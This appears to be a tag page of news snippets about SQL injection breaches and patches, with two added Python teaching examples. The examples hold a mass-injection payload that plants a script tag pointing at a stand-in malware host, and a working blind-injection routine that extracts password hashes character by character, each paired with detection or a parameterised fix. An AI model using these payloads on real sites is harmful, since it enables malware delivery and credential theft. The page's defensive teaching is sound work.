Articles about SQL injection


Joomla issues upgrade to patch critical SQL vuln

Joomla's developers have moved to fix a critical SQL injection vulnerability – but are coming under fire for taking a month to address the issue. The version 3.2.3 update, available since late last week, is described by Joomla as fixing a high priority core SQL injection bug (along with two medium priority XSS bugs and an …
The Register breaking news

Ruby on Rails has SQL injection vuln

The maintainers of Ruby on Rails are warning of an SQL injection vulnerability which affects all versions of the popular Web framework. They advise that users should immediately apply an upgrade available here. Designated CVE-2012-5664, the maintainers explain the bug this way: “Due to the way dynamic finders in Active Record …

PayPal plugs SQL injection hole, tosses $3k to bug-hunter

PayPal has fixed a security bug that could have allowed hackers to compromise the payment website's databases using an SQL injection attack. Researchers at Vulnerability Laboratory earned a $3,000 reward for discovering and reporting the critical bug to PayPal in August. An advisory sent to the Full Disclosure security mailing …
John Leyden, 30 Jan 2013

E-shopkeepers stabbed with SQL needles 'twice' as much as other sites

Retailers suffer twice as many SQL injection attacks on their systems as other industries, according to a new study by data-centre security firm Imperva, which claims the ferocity of web-based assaults is growing. The fourth annual edition of Imperva's Web Application Attack Report [PDF] also revealed that e-shopping …
John Leyden, 23 Jul 2013

MySQL.com hacked via... SQL injection vuln

MySQL.com was hacked over the weekend via an attack which used a blind SQL injection exploit to pull off the pawnage. Hackers extracted usernames and password hashes from the site, which were subsequently posted to pastebin.com. Easy-to-guess login credentials could easily be extracted from this data using rainbow tables to …
John Leyden, 28 Mar 2011

Bogus Firefox add-on FORCES WITLESS USERS to join vuln-hunting party

Cybercrooks have brewed up a botnet that uses a bogus Firefox add-on to scan the web for hackable websites. The so-called Advanced Power botnet runs SQL injection attacks on websites visited from infected machines. The malware, disguised as a legitimate add-on for Mozilla Firefox, found its way onto 12,500 systems, reports …
John Leyden, 17 Dec 2013

LizaMoon mass-injection attack reaches epidemic proportions

Malware writers are using website vulnerabilities to inject malicious scripts into thousands of websites as part of an ambitious attack ultimately designed to redirect surfers to a site pimping rogue anti-virus packages. The so-called LizaMoon mass-injection attack uses SQL injection trickery to inject a line of malicious code …
John Leyden, 31 Mar 2011
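How one injected statement can tag every row of a site's content, which is what the mass-injection campaigns reported on this page did (the 2008 and 2011 waves ran their payloads against Microsoft SQL Server backends, which accept stacked statements in one request). This is an added example, not code from the article or from any of the attacks it describes: the pages table, the sample rows, the malware.invalid hostname and the payload are all constructed here. Python's sqlite3 refuses stacked statements through execute(), so the run_stacked helper splits them and runs each in turn, standing in for a backend that accepts them. The find_tainted check at the end is the kind of scan a site owner would run to find which pages were overwritten.

```python
import sqlite3

# Constructed sample content table, standing in for a site's CMS data.
SAMPLE_PAGES = [
    (1, "Welcome", "Hello and welcome to our shop."),
    (2, "Sale", "Everything 20% off this week."),
    (3, "Contact", "Email us at shop@example.com."),
]

# Constructed payload tag; the hostname is made up, not a real attack server.
INJECTED_TAG = '<script src="http://malware.invalid/ur.php"></script>'

# What the attacker sends as the "page id" parameter: the expected value, a
# statement terminator, then an UPDATE that appends the tag to every row.
# The trailing comment swallows anything the application appends to the query.
MASS_INJECTION_PAYLOAD = (
    "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "' -- "
)


def make_content_db():
    """Build an in-memory database holding the constructed sample pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_PAGES)
    conn.commit()
    return conn


def run_stacked(conn, sql):
    """Run ';'-separated statements one after another and return the rows they
    produce. sqlite3's execute() rejects stacked statements; this helper
    reproduces the behaviour of a backend that accepts them, which is what the
    mass-injection payloads relied on."""
    rows = []
    for stmt in sql.split(";"):
        if stmt.strip():
            rows.extend(conn.execute(stmt).fetchall())
    return rows


def vulnerable_page(conn, page_id):
    """VULNERABLE: page_id is pasted into the statement text unquoted and
    unchecked, so a value containing ';' smuggles in extra statements."""
    sql = "SELECT title, body FROM pages WHERE id = " + page_id
    return run_stacked(conn, sql)


def find_tainted(conn):
    """Detection check: ids of rows whose text now carries a script tag, the
    fingerprint of a stored mass injection."""
    rows = conn.execute(
        "SELECT id FROM pages WHERE body LIKE '%<script%' OR title LIKE '%<script%' "
        "ORDER BY id"
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_content_db()
    print("tainted before:", find_tainted(db))      # []
    print("normal request:", vulnerable_page(db, "1"))
    vulnerable_page(db, MASS_INJECTION_PAYLOAD)
    print("tainted after:", find_tainted(db))       # [1, 2, 3]
```

The point worth noticing is that the request looks like an ordinary page view from the attacker's side and returns the page it asked for; the damage is the second statement, which touches rows the request never selected. A scan like find_tainted only catches the aftermath; the cause is the unparameterised id, and a backend that lets one request carry several statements only widens what a single bad parameter can do.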

Lauri Love investigation stretches to Australia, Sweden

Following the arrest of Lauri Love of Suffolk on charges that he gained unauthorised access to US government computers, it's emerged that he was working with co-conspirators in Australia and Sweden. According to the charges reported here yesterday, Love's twelve-month hacking spree included machines belonging to the US Army, …

No secret to stopping XSS and SQL injection attacks

SQL injection attacks and cross-site scripting exploits just won't die. The most recent and high-profile incident was a mass webpage attack on more than 100,000 pages, which included victims as diverse as The Wall Street Journal, TomTom, and the UK's Strathclyde police. There was a teetering stack of exploits involved in this …
Matt Stephens, 23 Jun 2010
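Two of the items above describe the attack and the remedy: the MySQL.com break-in pulled password hashes out through blind SQL injection, where the application never displays query results and the attacker learns only whether a row came back, and the piece just above argues that the fix is no secret. The following is an added example, not code from either article or from any site named on this page: a constructed users table with made-up hash values, a vulnerable lookup whose single true/false answer is enough to read a hash one character at a time, and the same lookup with a bound parameter, against which the identical probes return nothing. The table and column names, the `x'` prefix used to close the string literal and the alphabet searched are all assumptions made for the illustration.

```python
import sqlite3
import string

# Constructed user records; the hash values are arbitrary hex strings, not real hashes.
SAMPLE_USERS = [
    (1, "admin", "5f4dcc3b"),
    (2, "guest", "e10adc39"),
]


def make_users_db():
    """In-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def vulnerable_exists(conn, name):
    """VULNERABLE: name is spliced into the SQL text. The caller sees only
    True/False, which is exactly the one-bit oracle blind injection needs."""
    sql = "SELECT 1 FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchone() is not None


def safe_exists(conn, name):
    """Hardened: the value travels as a bound parameter and is never parsed as SQL."""
    row = conn.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def blind_extract(oracle, target_query,
                  alphabet=string.digits + string.ascii_letters, max_len=64):
    """Recover the string returned by target_query one character at a time,
    asking the oracle only yes/no questions.

    Each probe closes the application's string literal, ORs in a test on one
    character of the target, and leaves the application's own closing quote to
    finish the statement, so the executed WHERE clause reads:
        name = 'x' OR substr((<target_query>),<pos>,1)='<ch>'
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            probe = f"x' OR substr(({target_query}),{pos},1)='{ch}"
            if oracle(probe):
                hit = ch
                break
        if hit is None:   # substr() returns '' past the end, so nothing matches
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_users_db()
    target = "SELECT pw_hash FROM users WHERE name='admin'"
    print(blind_extract(lambda p: vulnerable_exists(db, p), target))        # 5f4dcc3b
    print(repr(blind_extract(lambda p: safe_exists(db, p), target)))        # ''
```

Each recovered character costs up to one request per symbol in the alphabet; real tooling cuts that to a handful per character by binary-searching the character code, but the principle is the same, and the hashes it yields are then attacked offline with rainbow tables or a cracker, as the MySQL.com item notes. Against safe_exists the probe is compared as a literal user name, no user has that name, and the loop stops at the first position with nothing recovered.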

Mass SQL injection hits English language websites

Thousands of websites in China have been booby trapped with code written to download Trojan software onto visitors who run vulnerable Windows PCs. Unlike earlier rounds of SQL injection attacks the latest assaults mostly target English language sites (predominantly sites hosted in China but with a .com suffix) and purposefully …
John Leyden, 21 May 2008

Next-gen SQL injection opens server door

A vulnerability estimated to affect more than 1 in 10 websites could go lethal with the finding that it can be used to reliably take complete control of the site's underlying server. Research to be presented at the Black Hat security conference in Amsterdam later this month will show how so-called SQL injection attacks open the …
Dan Goodin, 02 Apr 2009

Energy sector under increasing attack: DHS

The Department of Homeland Security, via its ICS-CERT group, is reporting growing attacks against critical infrastructure with the energy sector leading the way. Its most recent ICS-CERT Monitor report states that of more than 200 incidents it investigated between October 2012 and May 2013, 53 percent were in the energy sector. …

SQL injection taints BusinessWeek.com

Add BusinessWeek.com to the list of big-name sites felled by the mighty SQL injection attack. According to Sophos, the business news site has been infected with attack code that since sometime last week has been trying to install malware on the machines of those who visit the site. The attack affected hundreds of BusinessWeek. …
Dan Goodin, 16 Sep 2008

Under the microscope: The bug that caught PayPal with its pants down

Security researchers have published a more complete rundown of a recently patched SQL injection flaw on PayPal's website. The Vulnerability Laboratory research team received a $3,000 reward after discovering a remote SQL injection web vulnerability in the official PayPal GP+ Web Application Service. The critical flaw, which …
John Leyden, 15 Apr 2013

UK man Lauri Love accused of hacking US Federal Reserve

The US government has laid more hacking charges against a Brit alleged to have hacked into the US Federal Reserve. Lauri Love, 28, of Stradishall, Suffolk, is charged with one count of computer hacking and a further charge of aggravated identity theft over an alleged attack on Federal Reserve computer systems between October …
John Leyden, 28 Feb 2014

Microsoft and HP tackle SQL-injection scourge

With successful attacks against websites reaching epidemic levels, Microsoft and HP have released a free set of tools that help developers check their web applications for the mistakes that leave them open to exploits that can steal sensitive information and harm visitors. The tools are designed to scan websites for …
Dan Goodin, 26 Jun 2008

It may be ILLEGAL to run Heartbleed health checks – IT lawyer

Websites and tools that have sprung up to check whether servers are vulnerable to OpenSSL's mega-vulnerability Heartbleed have thrown up anomalies in computer crime law on both sides of the Atlantic. Both the US Computer Fraud and Abuse Act and its UK equivalent the Computer Misuse Act make it an offence to test the security of …
John Leyden, 11 Apr 2014

American Fantasy Football app lets hackers change team rosters

Security researchers have discovered a vulnerability in mobile versions of the Yahoo! Fantasy [American] Football app that created a means for hackers to change team lineups and post imposter comments on message boards. Yahoo! has plugged the security hole, but users who fail to update their mobile app to the most recent version …
John Leyden, 06 Sep 2013

Signatures no good at protecting databases, says Juniper

One of the most common forms of attack is the SQL injection, and although the vector is ancient and well-understood, it's notoriously difficult to defend against. Kevin Kennedy, senior director of product management for Juniper Networks' security business unit, is in Australia to demonstrate Juniper's latest shot at defeating …

Symantec slams Web Gateway back door on would-be corporate spies

Symantec has plugged a series of critical flaws in its Web Gateway appliances which included a backdoor permitting remote code execution on targeted systems. The flaws, discovered during a short crash test by security researchers at Austrian firm SEC Consult, created a means to execute code with root privileges - or the ability …
John Leyden, 29 Jul 2013

They didn't predict that: Astrologers! blamed! after! Yahoo! hack!

Weaknesses in cloud security and third-party code allowed a hacker to compromise Yahoo! systems last month, according to an analysis of the purported breach. In December, an Egyptian nicknamed ViruS_HimA claimed he cracked the web giant's security systems, acquired full access to 12 databases and broke into an unspecified server …
John Leyden, 29 Jan 2013

Microsoft rejects call to fix SQL password-exposure risk

Microsoft is butting heads with a company that provides software for database security over a weakness in SQL Server that can expose user passwords to anyone with administrative access to the program. Researchers at San Mateo, California-based Sentrigo warned Wednesday that the "significant vulnerability" is present in the 2000 …
Dan Goodin, 02 Sep 2009

Ex-Google, Mozilla bods to outwit EVIL BOTS with 'polymorphic' defence

Startup Shape Security is re-appropriating a favourite tactic of malware writers in developing a technology to protect websites against automated hacking attacks. Trojan authors commonly obfuscate their code to frustrate reverse engineers at security firms. The former staffers from Google, VMware and Mozilla (among others) have …
John Leyden, 21 Jan 2014

Symantec dismisses blind SQL hack claims

Symantec's website has been given the once-over by the same Romanian hacking group that exposed security problems with websites run by Kaspersky Lab, F-Secure and Bitdefender earlier this month. The hacker, Uno, claims that the document download centre section on Symantec's European site is vulnerable to a blind SQL Injection …
John Leyden, 20 Feb 2009

FBI sends memo to US.gov sysadmins: You've been hacked... for the past YEAR

Hacktivists allegedly affiliated with Anonymous have been covertly breaking into US government systems and pilfering sensitive information for nearly a year, the FBI warned last week. The attacks (which began last December and are thought to be ongoing) exploit flaws in Adobe's ColdFusion web app development software to plant …
John Leyden, 18 Nov 2013

SAP users slack, slow and backward on security

Cross-site scripting, failure to check credentials, directory traversal and SQL injection make up more than three-quarters of vulnerabilities in SAP environments, according to a presentation by ERPScan's Alexander Polyakov to RSA Conference Asia Pacific 2013. And the vulnerable state of the SAP world is increasingly attracting …

Second LulzSec Sony website hacker starts a year in the cooler

A LulzSec hacker has been sentenced to a year in a US jail for hacking Sony Pictures and dumping personal information of 138,000 movie fans online. Raynaldo Rivera, 21, of Tempe, Arizona, will spend 366 days behind bars, followed by 13 months of house arrest and 1,000 hours of community service for his involvement in the …
John Leyden, 09 Aug 2013

Zombie PCs are for crimelord chumps: Fear clusters, says infosec ace

It may be possible for a "single dedicated attacker" to run an internet "carpet-bombing" attack by applying Big Data and distributed computing technologies, security researcher Alejandro Caceres warns. The traditional botnet, or network of hijacked computers, has been used for distributed computing problems, such as Bitcoin …
John Leyden, 14 Aug 2013

Obamacare website 'either hacked or will be soon', warns infosec expert

Hackers have thrown multiple attacks at US President Obama's medical insurance bazaar HealthCare.gov since it went live in October, according to a senior US government official. Acting assistant Homeland Security secretary Roberta Stempfley told a hearing of the House Homeland Security (HHS) Committee that the website was …
John Leyden, 19 Nov 2013

Yahoo! hack! leaks! 453,000! unencrypted passwords!

A Yahoo! service has apparently succumbed to a simple database attack that leaked 453,000 unencrypted account passwords online. A huge document containing the lifted SQL structures, software variables, usernames and cleartext passwords was linked to from a web forum. In the file, the hackers described the break-in as "a wake-up …
John Leyden, 12 Jul 2012

CISPA row: Slurped citizen data is ENORMO HACK TARGET - infosec boss

The ability to identify common patterns in real-world attacks makes crowd-sourcing threat intelligence extremely useful, according to a study from security tools firm Imperva. The report arrives just as a privacy row rages over the new Cyber Intelligence Sharing and Protection Act (CISPA) law in the US. But the head of the …
John Leyden, 23 Apr 2013

1 MILLION accounts leaked in megahack on banks, websites

Hacker collective Team GhostShell leaked a cache of more than one million user account records from 100 websites over the weekend. The group, which is affiliated with hacktivists Anonymous, claimed they broke into databases maintained by banks, US government agencies and consultancy firms to leak passwords and documents. Some of …
John Leyden, 28 Aug 2012

Hackers leak 120,000 student records in raid on world's top unis

Hackers have attacked the world's top 100 universities in a protest against tuition fees and what's deemed to be a falling quality of education. Anonymous-affiliated Team GhostShell dumped information from 120,000 user accounts and student records after raiding servers at institutions including Princeton, Harvard, Cambridge and …
John Leyden, 02 Oct 2012

Australian Federal Police claim arrest of 'LulzSec leader'

The Australian Federal Police (AFP) has arrested a man described as "a self-proclaimed leader of the group ‘Lulz Security’ (Lulzsec), a computer hacking group that has existed since 2011." The as-yet-unnamed 24-year-old man was apprehended in the coastal town of Point Clare after using a known exploit to last month …

Hackers now pick tools from script kiddies' toybox – report

Hackers are increasingly turning to automated software tools to launch attacks. According to research from Imperva, more than 60 per cent of SQL injection attacks and as many as 70 per cent of Remote File Inclusion attacks (the two most common attack types) are automated. Remote File Inclusion attacks allow hackers to plant …
John Leyden, 24 Apr 2012

'World's BIGGEST online fraud': Suspect's phone had 'location' switched on

Two Russians arrested over their suspected involvement in the largest online fraud in US history were tracked down by analysing photos they posted to social media sites and tracking the location of one suspect's mobile phone, Reuters reports. Four Russians and a Ukrainian national were named as suspects in a credit card hacking …
John Leyden, 29 Jul 2013

IRS boss on XP migration: 'Classic fix the airplane while you're flying it attempt'

That whole Heartbleed bug thing just kept running on and on this week, first with accusations that the National Security Agency had defied its brief by knowing about the security breach and doing stuff-all about it. The Heartbleed flaw, which was revealed last week, allows attackers to access passwords, crypto-keys and other …

Security still slack in WA government agencies

While not as utterly hopeless as last year, IT security is still troublesome in Western Australia’s government agencies. In last year’s annual audit, the Auditor General strolled through fourteen agency networks in an undetected penetration test. This year, the auditor’s staff have looked at payment security in nine agencies, as …

Second LulzSec member pleads guilty to Sony hack

A second suspect has admitted involvement in a high-profile attack last year against the Sony Pictures website by notorious hacking crew LulzSec. Passwords and personal information leaked as a result of the breach in May 2011. The site was breached using an SQL injection attack, a common hacking technique, to extract personal …
John Leyden, 15 Oct 2012

WHMCS under renewed DDoS blitz after patching systems

WHMCS, the UK-based billing and customer support tech supplier, has once again come under denial of service attacks, on this occasion following an upgrade of its systems to defend against a SQL injection vulnerability. The security patch was applied on Tuesday following reports by KrebsOnSecurity that a hacker was auctioning …
John Leyden, 01 Jun 2012

Ruby off the Rails: Enormo security hole puts 240k sites at risk

Popular programming framework Ruby on Rails has two critical security vulnerabilities - one allowing anyone to execute commands on the servers running affected web apps. The newly uncovered bugs both involve the parsing and handling of data supplied by visitors to a Rails application. The CVE-2013-0156 hole is the more severe of …
John Leyden, 10 Jan 2013

SQL attacks inject government sites in US, UK

A new round of SQL injection attacks has infected millions of web pages belonging to businesses and government agencies, including those that belong to the National Institutes of Health and Education Department in the US and the UK Trade & Investment. This search shows at least 1.45 million infected pages and queries here and …
Dan Goodin, 07 Aug 2008

LinkedIn faces class action suit over password leak

LinkedIn is facing a class action suit over the security breach that saw millions of users' passwords posted online. Illinois resident Katie Szpyrka leads the complaint, which alleges that LinkedIn failed to "properly safeguard its users' personally identifiable information". The complaint filed in California accuses the …

Black hat greed reducing software vulnerability report rate

HP has kicked off the round of reports that accompany each RSA conference with its analysis of security vulnerabilities, and has revealed that although the overall trend is positive, the growing market for zero-day flaws is reducing the number of the most serious problems that are disclosed. The long- …
Iain Thomson, 26 Feb 2013

Romanian cops cuff suspected serial hacker TinKode

Romanian police have arrested a man suspected of breaking into the websites of NASA and the Pentagon in a series of high-profile hack attacks. Razvan Manole Cernaianu, 20, from Timisoara, is accused of publishing details of the SQL injection vulnerabilities discovered on the targeted websites under the hacker handle TinKode. The …
John Leyden, 01 Feb 2012

Patchy app development security slammed

Eight in 10 applications failed to pass stricter security testing standards in tests by application security assessment firm Veracode. Veracode tightened up its testing procedures so that apps prone to cross-site scripting and SQL injection errors automatically failed. This zero-tolerance policy reflects the fact that these two …
John Leyden, 08 Dec 2011

Daily Telegraph hit by SQL hack attack

Vulnerabilities on a Daily Telegraph website have been exposed by serial grey-hat hacker Unu. In a posting on the hackersblog site Unu outlines a number of SQL injection security weaknesses on the newspaper's website. The entry, which includes screenshots to substantiate the claim, claims that subscriber email addresses were …
John Leyden, 09 Mar 2009

Tipsters exposed after South Africa's national police force hacked

The identities of more than 15,000 South Africans who reported crimes or provided tip-offs to the police have been exposed following an attack on a SAPS (South African Police Service) website. The names and personal details of whistleblowers and crime victims were lifted from www.saps.gov.za and uploaded to a bullet-proof …
John Leyden, 23 May 2013

Second LulzSec suspect charged over Sony Pictures hack

US police have arrested a second suspect in the June 2011 hacktivist attacks on Sony Pictures Entertainment, an assault that resulted in a breach of passwords and personal data involving 38,000 accounts. Raynaldo Rivera, 20, of Tempe, Arizona, surrendered to authorities on Tuesday after he was named in a federal grand jury …
John Leyden, 29 Aug 2012

Yahoo! fixes! password! leak! vulnerability!

Yahoo! has fixed the flaw that allowed hackers to scrape the unencrypted passwords of over 450,000 of its customers' accounts. "We have taken swift action and have now fixed this vulnerability, deployed additional security measures for affected Yahoo! users, enhanced our underlying security controls and are in the process of …
Iain Thomson, 13 Jul 2012